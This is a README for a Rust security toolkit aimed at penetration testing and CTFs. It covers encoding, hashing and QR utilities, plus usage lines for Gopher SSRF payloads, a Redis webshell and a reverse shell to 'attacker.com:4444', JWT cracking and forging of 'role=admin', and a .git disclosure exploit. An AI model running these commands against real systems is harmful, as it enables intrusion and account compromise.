The Cyber Swiss Army Knife for Terminal
A powerful command-line toolkit built with Rust, providing various security and encoding utilities for penetration testing, CTF competitions, and daily development tasks.
| Command | Alias | Description |
|---|---|---|
basex |
bx |
Base encoding/decoding (Base16/32/36/58/62/64/91/100) |
basic |
- | URL encode/decode, Hex, ASCII, XOR, Random string |
| Command | Alias | Description |
|---|---|---|
hash |
- | Hash functions (MD2/4/5, SHA1/2/3, RIPEMD160, bcrypt, MySQL, NTLM, HMAC) |
hashpow |
pow |
Hash Proof of Work brute force (MD5/SHA1) |
encrypt |
enc |
File encryption with AES-CTR |
| Command | Alias | Description |
|---|---|---|
jwttool |
jwt |
JWT Print/Crack/Modify/Create |
| Command | Alias | Description |
|---|---|---|
gopher |
gop |
Generate Gopher SSRF payloads (FastCGI/HTTP/Redis) |
fastcgi |
fcgi |
FastCGI protocol record generator |
githack |
gh |
Git folder disclosure exploit tool |
sitemap |
sm |
Generate sitemap.xml from URLs |
| Command | Alias | Description |
|---|---|---|
timestamp |
ts |
Parse and convert timestamps |
qrcode |
qr |
QR code generate and parse |
parser |
- | Parse DS_Store, /proc/net files |
wechat |
vx |
Decrypt WeChat database files |
completion |
comp |
Generate shell completion scripts |
# Clone the repository
git clone https://github.com/virzz/enyo.git
cd enyo/enyo-rs
# Build release version
cargo build --release
# Install to ~/.cargo/bin
cargo install --path .brew tap virzz/enyo
brew install enyo# Base64 encode
enyo basex b64e "Hello World"
# Output: SGVsbG8gV29ybGQ=
# Base64 decode
enyo bx b64d "SGVsbG8gV29ybGQ="
# Output: Hello World
# Auto-detect and decode (fuzzing mode)
enyo bx "SGVsbG8gV29ybGQ="# MD5 hash
enyo hash md5 "password"
# Output: 5f4dcc3b5aa765d61d8327deb882cf99
# SHA256 hash
enyo hash sha2 -t 256 "password"
# SHA256 with HMAC
enyo hash sha2 -t 256 -s "secret_key" "message"
# bcrypt generate
enyo hash bcrypt gen "password"
# MySQL password hash
enyo hash mysql5 "password"# Print JWT content
enyo jwt jwtp "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..."
# Modify JWT claims
enyo jwt jwtm -t "token" -c "role=admin" -s "secret"
# Crack JWT secret
enyo jwt jwtc -t "token" -m 1 -l 6
# Create new JWT
enyo jwt jwtg -c "name=test" -c "role=admin" -s "secret"# FastCGI exploit payload
enyo gopher fastcgi -t "127.0.0.1:9000" -c "id"
# Redis write webshell
enyo gopher webshell -t "127.0.0.1:6379" -n "shell.php"
# Redis reverse shell
enyo gopher reverse -t "127.0.0.1:6379" -r "attacker.com:4444"# Exploit .git folder disclosure
enyo githack "http://example.com/.git/"# URL encode
enyo basic urle "hello world"
# Output: hello%20world
# Hex to string
enyo basic h2s "48656c6c6f"
# Output: Hello
# Generate random string
enyo basic rstr 16 -x # 16 chars hex string
# XOR two strings
enyo basic xor "aaaa" "1111"# Encrypt file
enyo encrypt -k "12345678901234567890123456789012" file.txt
# Check if file is encrypted
enyo encrypt -c file.txt# Get current timestamp
enyo ts
# Parse timestamp to datetime
enyo ts 1736441819
# Output: 2025-01-09 18:30:19
# Parse datetime to timestamp
enyo ts "2025-01-09 18:30:19"
# Output: 1736441819# Generate QR code to terminal
enyo qr qrgen "https://example.com"
# Generate QR code to file
enyo qr qrgen -o qrcode.png "https://example.com"
# Binary string to QR code
enyo qr qrbs "100110101001..."Generate shell completion scripts:
# Bash
enyo completion bash > ~/.bash_completion.d/enyo
# Zsh
enyo completion zsh > ~/.zfunc/_enyo
# Fish
enyo completion fish > ~/.config/fish/completions/enyo.fish
# PowerShell
enyo completion powershell > enyo.ps1Each command module can also be used as a standalone binary:
# Build all binaries
cargo build --release --bins
# Available binaries:
./target/release/basex
./target/release/hash
./target/release/jwttool
./target/release/gopher
./target/release/githack
./target/release/encrypt
./target/release/timestamp
./target/release/qrcode
# ... and more# Run tests
cargo test
# Run clippy
cargo clippy
# Format code
cargo fmt
# Build documentation
cargo doc --openThis project is licensed under the MIT License - see the LICENSE file for details.
Mozhu (陌竹)
- Email: mozhu233@outlook.com
- GitHub:
Named after Enyo (Ἐνυώ) - the Greek goddess of war and destruction